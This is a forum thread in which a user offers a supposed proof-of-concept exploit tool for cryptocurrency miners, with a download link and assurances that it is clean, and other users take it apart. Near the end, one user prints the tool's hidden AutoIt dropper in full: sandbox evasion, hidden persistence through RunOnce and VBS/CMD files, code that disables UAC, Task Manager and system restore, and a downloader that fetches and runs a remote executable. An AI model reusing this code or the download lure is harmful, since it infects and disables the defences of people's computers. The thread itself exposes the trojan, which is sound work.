zmap, masscan, or any other scanner just scans ports. I have a homemade tool that scans the entire net for "some" responses, that expose every miner online (knc, Ant, BFL, ....) in about 4 hour

Again, I can be wrong but the only shared thing i can think of is cgminer. It doesn't open port for listening so again, i can't take you seriously...


I'm sorry but, to my eyes, you're are no longer credible...

Well, KnC DID upgrade their firmware, so i guess that proves enough to me.
I'm sorry, i can not post more "proof" on a public forum. Unlike others, i do care about general security.

And yes, you are wrong about the scanning part.
And no, i did not find a 0day. It's already known, exploited and documented long before my post.

But then, once again, feel free to skip this thread.
I'm not posting this to have flamewars about who is right and who is wrong.
This behaviour is mostly the reason why i don't make any more efforts to patch up the new exploit.

I tought i could help the community, but this forum just seems to be a bunch of bashing kids.
Every topic someone posts, the entire forum screams "fake", "scammer", etc. Why is this?

Read for exemple the KnC intro topic. Same there. All fake and scam. Then why are you all still here....

[Walking Glitch]

I doubt steve trusts me with it, but if he wants someone to vet his exploit, I would do it. In fact, I already have a good idea of how exactly he did it, but I don't have a Jupiter/Mercury/Saturn/Neptune to try it on.

[steve15]

I doubt steve trusts me with it, but if he wants someone to vet his exploit, I would do it. In fact, I already have a good idea of how exactly he did it, but I don't have a Jupiter/Mercury/Saturn/Neptune to try it on.

At most, i can compile everything into some DLL files. That way you make the executable file yourself, and just call my API.

[steve15]

I finished compiling my "Proof of Concept" application to allow you to test out the exploits on you OWN miners.

Just run the "minerProof.exe" file. It will scan your network, revealing all your devices into your LAN.
Each device will get it's own node in the treelist. When expanding your device, it will show you all information, included all known exploits about it!

Once you get your miner (Knc will show up as server lighttpd), expand the list to "firmware". It will list the executed exploit result.

After finding all devices, the software will scan your network to idendify if your are remotely vulnerable or not.
It will also give you solutions if a security risk has been found on your network.

This application has been tested with Knc jupiter, AntMiner's, cgminer and bfgminer, running on Windows 8.1 x64.

Application restrictions: ONLY your OWN subnet can be scanned ! When network sniffing is detected, the application will auto shut down!

Antivirus results: Scanned with MetaScan, file is clean 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor.
The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean!

Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.

AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef

If you don't trust the files, than simply don't download or run them.

If you find an exploit on your system, then please patch up using the solutions provided, and post your exploit in this topic to prove the concept of it!!

File download URL: https://mega.co.nz/#!FNIlSL5Q!5SVBuSNrXkT5ckXmdK7Fews0-avozcE8QcL4_acjHss | minerProofOfConcept.zip | 1.1Mb

If you have problems using the tool, please write me a PM, but dont spam this topic with questions about it.


JUST TO BE CLEAR

Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.

AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.

If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.

I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.

[ici_lemmy]

Ok, just a quick analysis... And I have a few question...

Can you explain why you need to create an hidden directory in the user profile dir ? (named "raklr")
Can you explain what the files in this directory are made for ?
Can you explain why do you need to autostart fg0ezkfEkds5.exe ?

The tool didn't even started in my XP vm !

My quick conclusion : this is VERY sispicious...

[steve15]

Ok, just a quick analysis... And I have a few question...

Can you explain why you need to create an hidden directory in the user profile dir ? (named "raklr")
Can you explain what the files in this directory are made for ?
Can you explain why do you need to autostart fg0ezkfEkds5.exe ?

The tool didn't even started in my XP vm !

My quick conclusion : this is VERY sispicious...

Yes i can explain. This will not even run in VM.

AutoIT creates a local file for monitoring against network sniffers / other suspicious files running at the same time.
When detected, it kills the application.

As long as your Antivirus/malware scanner/firewall does not go bezerk, no need to worry ;-)

EDIT: XP ?? You need .NET framework 4 to run it...

[ici_lemmy]

I've played a little bit more with your tool...
I managed to remove your AutoIt exe from my XP vm, easily bypass it when lauching your tool and finally run your tool.

So now i'm waiting actual miner opinion but you've lost all credibility !

[steve15]

I've played a little bit more with your tool...
I managed to remove your AutoIt exe from my XP vm, easily bypass it when lauching your tool and finally run your tool.

So now i'm waiting actual miner opinion but you've lost all credibility !

Good luck, the tool will not display any results when the detection module is shut down, or when running in VMware environments.

If you doubt my credibility, feel free, but once again, stop spamming my topic because you can't read it blocks in virtual environments to prevent abuse.

The security build in can not be bypassed.

[ici_lemmy]

The security build in can not be bypassed.

I lol'ed...
Your exe is actually an sfx rar containing,among others, two other exe : your AutoIt protection(?) and your .net exe that can be fully decompiled with dotpeek or ILSpy !
For a pentesting expert, you could have done a better job !

[steve15]

The security build in can not be bypassed.

I lol'ed...
Your exe is actually an sfx rar containing,among others, two other exe : your AutoIt protection(?) and your .net exe that can be fully decompiled with dotpeek or ILSpy !
For a pentesting expert, you could have done a better job !

Feel free to decompile it, and PM me the results.
We'll compare the source with your results then ;-)

[nuno12345]

frmUPnPBrowser:

Code:

Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?

[steve15]

frmUPnPBrowser:

Code:

Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?

So you can decompile a standard .NET form... Congratz! 
Now show me the code that gets executed?? That's what this is about, right ?
Why on earth should i encrypt a standard form doing nothing but displaying some results ??

I can also just provide you the manifest XML file, instead of acting like a fool that can decompile a standard winform.

[steve15]

Allright, to keep this post on topic.

JUST TO BE CLEAR

Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.

AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.

If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.

I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.

Over and out.

[ici_lemmy]

That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...

Code:

#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
	delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
	mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
	startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
	antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
	fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
	botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
	downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
	disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
	disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
	antitask()
Else
EndIf

Func delay()
	$counter = 0
	While $counter <= 5
		Sleep(5000)
		ShellExecute(@SystemDir & "\mshta.exe")
		$counter = $counter + 1
		_rundos("taskkill /IM mshta.exe")
	WEnd
EndFunc

Func systemhide()
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
	$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
	$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
	$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
	If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
	Else
		MsgBox($type, $title, $message)
		FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
	EndIf
EndFunc

Func mutex()
	$scriptname = "lmsqQw.exe"
	If UBound(ProcessList($scriptname)) > 2 Then Exit 
EndFunc

Func antitask()
	$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
	If NOT ($read_antitask = "1") Then
		RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
	EndIf
EndFunc

Func disable_uac()
	$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
	If NOT ($read_uac = "0") Then
		RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
	EndIf
EndFunc

Func startup()
	$buac = _checkelevationenabled()
	If $buac = 0 Then
	Else
		FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
		FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
	EndIf
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
	If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
		Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
		$autoit3 = "lmsqQw.exe"
		FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
		FileClose($bat)
		Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
		FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
		FileClose($vbs)
		RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
		FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
		FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
		If FileExists($unicode_startup & "\start.lnk") Then
			FileDelete($unicode_startup & "\start.lnk")
		EndIf
	Else
	EndIf
EndFunc

Func _checkelevationenabled()
	$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
	If @error Then Return 
	Local $struct = DllStructCreate("BOOL")
	Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
	If @error Then
		Return SetError(@error)
	EndIf
	Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
	If WinGetText("Program Manager") = "0" Then
		Exit 
	Else
	EndIf
	If ProcessExists("VboxService.exe") Then
		Exit 
	EndIf
	If ProcessExists("VMwaretray.exe") Then
		Exit 
	EndIf
EndFunc

Func persistence()
	If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
		$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
		ShellExecute($pathtovbs)
		Exit 
	EndIf
EndFunc

Func downloader()
	If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
	Else
		FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
		$random_download_name = Random(10000, 99999, 1) & ".exe"
		Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
		Do
			Sleep(250)
		Until InetGetInfo($hdownload, 2)
		Local $nbytes = InetGetInfo($hdownload, 0)
		InetClose($hdownload)
		ShellExecute($unicode_userprofile & "\" & $random_download_name)
	EndIf
EndFunc

Func bsod()
	$a = ProcessList()
	For $i = 1 To UBound($a) - 1
		ProcessClose($a[$i][0])
	Next
	Exit 
EndFunc

Func botkiller()
	RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
	If FileExists($uniscriptdir & "\check.txt") Then
	Else
		RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
		FileWrite($uniscriptdir & "\check.txt", "")
	EndIf
EndFunc

Func _rundos($scommand)
	Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
	Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
	While 1
